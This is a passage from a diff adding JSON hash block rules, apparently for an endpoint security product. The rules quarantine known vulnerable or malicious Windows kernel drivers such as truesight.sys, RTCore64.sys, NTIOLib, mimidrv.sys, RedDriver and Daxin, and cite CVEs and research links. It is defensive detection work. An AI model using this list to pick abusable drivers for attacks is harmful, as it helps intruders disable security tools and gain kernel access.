+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.821411Z",
+ "creation_date": "2026-03-23T11:45:31.821413Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.821418Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b0bf7a1cb69e0d19175fad6aaf6ca07d429f06a6decc636ad221bd72e78ca36f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6f7d3b82-c47c-50a1-8c68-386690484bff",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.148485Z",
+ "creation_date": "2026-03-23T11:45:31.148487Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.148493Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7b154b1a86b758c420b19946aba1773fbe02f74fe9f37ce273408465e14ec99f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6f7fbff8-dae0-529e-a3f4-428258416740",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.156432Z",
+ "creation_date": "2026-03-23T11:45:31.156434Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.156439Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6ce80f5eadb5ad84daa4fb31691fd23799a3aed88ab9f4485a35524ec9119c9e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6f8038e8-ad84-577e-a437-7e1bce149459",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.829631Z",
+ "creation_date": "2026-03-23T11:45:30.829639Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.829652Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "338c3f1c416ed3bd38103c35ea76b8ca9e79c903cf00c72c15794c185032de28",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6f960064-4aa2-5823-9954-12e522acc763",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.821385Z",
+ "creation_date": "2026-03-23T11:45:30.821388Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.821397Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7553c76b006bd2c75af4e4ee00a02279d3f1f5d691e7dbdc955eac46fd3614c3",
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6f99187b-0598-56fb-bfea-a910282ba4e0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.607900Z",
+ "creation_date": "2026-03-23T11:45:29.607902Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.607908Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f37d609ea1f06660d970415dd3916c4c153bb5940bf7d2beb47fa34e8a8ffbfc",
+ "comment": "Micro-Star MSI Afterburner vulnerable driver (aka RTCore32.sys and RTCore64.sys) [CVE-2019-16098] [https://www.loldrivers.io/drivers/275c80c5-a67c-4536-b29e-4e481242cb01/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6fb9ec09-20ab-5b14-9a3a-3f7b6fc9c5cd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.979274Z",
+ "creation_date": "2026-03-23T11:45:29.979276Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.979281Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c1c4310e5d467d24e864177bdbfc57cb5d29aac697481bfa9c11ddbeebfd4cc8",
+ "comment": "Vulnerable Kernel Driver (aka d.sys) [https://www.loldrivers.io/drivers/7a7630d6-d007-4d84-a17d-81236d9693e1/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6fc33a70-602c-593d-8d12-c9913cdbcc7f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.465568Z",
+ "creation_date": "2026-03-23T11:45:30.465571Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.465580Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e99580e25f419b5ad90669e0c274cf63d30efa08065d064a863e655bdf77fb59",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6fc68786-6956-5406-938b-eb255074a7e2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.464571Z",
+ "creation_date": "2026-03-23T11:45:30.464574Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.464582Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d41e39215c2c1286e4cd3b1dc0948adefb161f22bc3a78756a027d41614ee4ff",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6fe26f27-6596-5e84-bd9c-1dc373053acc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.827272Z",
+ "creation_date": "2026-03-23T11:45:30.827275Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.827280Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "93961c2756dc824d1d11867c294445cc18ac611082536bbe5112c7e8827da329",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6fe2ff09-7355-57e3-8c58-c4944d696fa4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.607961Z",
+ "creation_date": "2026-03-23T11:45:29.607963Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.607969Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ff8d17761c1645bdd1f0eccc69024907bbbfbe5c60679402b7d02f95b16310fe",
+ "comment": "Micro-Star MSI Afterburner vulnerable driver (aka RTCore32.sys and RTCore64.sys) [CVE-2019-16098] [https://www.loldrivers.io/drivers/275c80c5-a67c-4536-b29e-4e481242cb01/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6fe63fa7-402d-50cd-b30c-384873b9c53e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.464883Z",
+ "creation_date": "2026-03-23T11:45:30.464887Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.464896Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0d676baac43d9e2d05b577d5e0c516fba250391ab0cb11232a4b17fd97a51e35",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6fec57bd-0b69-5721-b703-bdbdf7a78ddf",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.614857Z",
+ "creation_date": "2026-03-23T11:45:29.614858Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.614864Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cc586254e9e89e88334adee44e332166119307e79c2f18f6c2ab90ce8ba7fc9b",
+ "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6fecbb49-a0a4-5955-b328-2e663b1235a3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.986031Z",
+ "creation_date": "2026-03-23T11:45:29.986033Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.986039Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c9fbff8b749a1f580b5b5b9e59ec3ffd769b4179970b82e32a3d36e7a3a8cb1a",
+ "comment": "Malicious Kernel Driver related to RedDriver (aka telephonuAfY.sys, spwizimgVT.sys, 834761775.sys, reddriver.sys, typelibdE.sys, NlsLexicons0024UvN.sys and ktmutil7ODM.sys) [https://blog.talosintelligence.com/undocumented-reddriver/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6ff8a788-0f4b-519f-91ef-b1218ef5d3d1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.615380Z",
+ "creation_date": "2026-03-23T11:45:29.615382Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.615387Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "809403706c3669a0d67bd35a87f66714989d1bc66e2aa6ca5979781ae3c4fdb0",
+ "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7008cc84-d4e2-59ec-99b2-f4085821cad1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.485936Z",
+ "creation_date": "2026-03-23T11:45:31.485940Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.485960Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a3e4562b565b106fe859f06622c2674f44ef5bb41c5144583285a408d0870e51",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "700b3063-0b49-5f4c-aafc-bb2782aa5516",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.471941Z",
+ "creation_date": "2026-03-23T11:45:30.471969Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.471979Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fb1183ef22ecbcc28f9c0a351c2c0280f1312a0fdf8a9983161691e2585efc70",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "700f6c07-750b-566b-b302-c5bb9de43933",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.146928Z",
+ "creation_date": "2026-03-23T11:45:31.146930Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.146936Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "95080c8ed5594235dbf86ab99a1f4fd22edeccecfe41241472db3975f2b7fa75",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "701e52f5-f2c5-54c6-a466-b22bfd947793",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.140229Z",
+ "creation_date": "2026-03-23T11:45:31.140231Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.140236Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "acea5013470978ce0b3d41c4204d0fdd3d5fd3f28cc3ecad11b33e01fc1bc1be",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "702608f7-0986-5a30-bdf0-432338f19434",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.812889Z",
+ "creation_date": "2026-03-23T11:45:31.812891Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.812896Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ec71df85d1b89a3e7f3f9bcaf793e19ed6aca96f84c99470d0684e1004bfa345",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "702d1381-28b6-5782-a591-f463c771957a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.981764Z",
+ "creation_date": "2026-03-23T11:45:29.981766Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.981771Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "15b081ec83a89182b5bb0a642d56513f40810b5b0a42e904ab6d3fa8f34c0446",
+ "comment": "Malicious Kernel Driver (aka daxin_blank4.sys) [https://www.loldrivers.io/drivers/f8bddc8b-49b9-41f7-a877-d15ec3f174f9/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "703850d4-8c21-5a7c-a151-07e840e86676",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.488327Z",
+ "creation_date": "2026-03-23T11:45:31.488329Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.488334Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "66616748bb5b41179385a9c4d1498a0b88fa38ab41f7de83df2995795f739902",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "70389757-51d5-5512-9844-8954af94f750",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.141380Z",
+ "creation_date": "2026-03-23T11:45:31.141382Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
